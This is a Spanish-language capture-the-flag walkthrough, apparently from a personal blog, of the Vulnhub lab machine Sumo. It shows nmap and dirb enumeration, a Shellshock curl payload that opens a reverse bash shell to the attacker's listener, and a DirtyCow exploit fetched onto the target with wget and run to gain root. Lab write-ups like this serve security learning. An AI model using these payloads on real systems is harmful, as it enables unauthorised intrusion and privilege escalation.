__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[VLN] Sumo

Hoy vamos a hackear la maquina de Vulnhub llamada Sumo. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/sumo-1,480/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.104 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 12:18 CEST Nmap scan report for ubuntu.home (192.168.1.104) Host is up (0.00026s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA) | 2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA) |_ 256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.88 seconds
    Vamos a ver si encontramos algo en el puerto 80... En el primer escaneo, usando el siguiente comando: dirb http://192.168.1.104/cgi-bin /usr/share/wordlists/dirb/big.txt Nos ha aparecido el directorio /cgi-bin, asi que vamos a ver si vemos algo mas dentro...
    sml@Cassandra:~$ dirb http://192.168.1.104/cgi-bin /usr/share/wordlists/dirb/big.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat May 16 12:44:01 2020 URL_BASE: http://192.168.1.104/cgi-bin/ WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt ----------------- GENERATED WORDS: 20458 ---- Scanning URL: http://192.168.1.104/cgi-bin/ ---- + http://192.168.1.104/cgi-bin/test (CODE:200|SIZE:14) --------------- END_TIME: Sat May 16 12:44:14 2020 DOWNLOADED: 20458 - FOUND: 1
    Encontramos /cgi-bin/test... La VM parece estar muy anticuada asi que vamos a probar con shellshock.
  • Exploitation
  • Ponemos nuestro nc a la escucha..
    sml@Cassandra:~$ nc -nlvp 5555
    Y desde otro terminal lanzamos lo siguiente:
    sml@Cassandra:~$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.148/5555 0>&1'" http://192.168.1.104/cgi-bin/test
    Y obtenemos la shell :)
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.104] 40918 bash: no job control in this shell www-data@ubuntu:/usr/lib/cgi-bin$ www-data@ubuntu:/usr/lib/cgi-bin$ python -c 'import pty; pty.spawn("/bin/sh")'
  • Privilege Escalation
  • Una vez dentro, vemos que el sistema tiene un kernel bastante antiguo asi que probamos con el exploit dirtycow. https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7 1c902f55c09aa8ced351690e1e627363c231b45/c0w.c Lo descargamos y compilamos en nuestra maquina!
    sml@Cassandra:~$ wget https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7 1c902f55c09aa8ced351690e1e627363c231b45/c0w.c --2020-05-17 15:48:15-- https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7 1c902f55c09aa8ced351690e1e627363c231b45/c0w.c Resolviendo gist.githubusercontent.com (gist.githubusercontent.com)... 151.101.132.133 Conectando con gist.githubusercontent.com (gist.githubusercontent.com)[151.101.132.133]:443... conectado. Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 4368 (4,3K) [text/plain] Grabando a: “c0w.c†c0w.c 100%[======================>] 4,27K --.-KB/s en 0s 2020-05-17 15:48:16 (25,2 MB/s) - “c0w.c†guardado [4368/4368] sml@Cassandra:~$ gcc -pthread c0w.c -o c0w c0w.c: In function ‘main’: c0w.c:103:3: warning: implicit declaration of function ‘asprintf’; did you mean ‘vsprintf’? [-Wimplicit-function-declaration] 103 | asprintf(&backup, "cp %s /tmp/bak", suid_binary); | ^~~~~~~~ | vsprintf c0w.c:104:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration] 104 | system(backup); | ^~~~~~ sml@Cassandra:~$ cp c0w /var/www/html
    Una vez compilado, ponemos el binario en nuestro servidor web para poder descargarlo desde la maquina "victima".
    www-data@ubuntu:/tmp$ wget http://192.168.1.148/c0w wget http://192.168.1.148/c0w --2020-05-17 06:48:48-- http://192.168.1.148/c0w Connecting to 192.168.1.148:80... connected. HTTP request sent, awaiting response... 200 OK Length: 17904 (17K) [application/octet-stream] Saving to: `c0w' 0K .......... ....... 100% 424M=0s 2020-05-17 06:48:48 (424 MB/s) - `c0w' saved [17904/17904]
    Damos permisos de ejecucion y ejecutamos.
    www-data@ubuntu:/tmp$ chmod +x c0w $ ./c0w (___) (o o)_____/ @@ ` \ \ ____, //usr/bin/passwd // // ^^ ^^ DirtyCow root privilege escalation Backing up /usr/bin/passwd to /tmp/bak mmap 35d2c000 madvise 0 ptrace 0 $
    Ahora solo nos falta ejecutar "passwd"...
    $ /usr/bin/passwd /usr/bin/passwd root@ubuntu:/tmp# id id uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
  • root.txt
  • root@ubuntu:/tmp# cd /root root@ubuntu:/root# ls root.txt root@ubuntu:/root# cat root.txt {Sum0-SunCSR-2020_r001}
  • End
  • Y con esto ya seriamos root de la maquina :)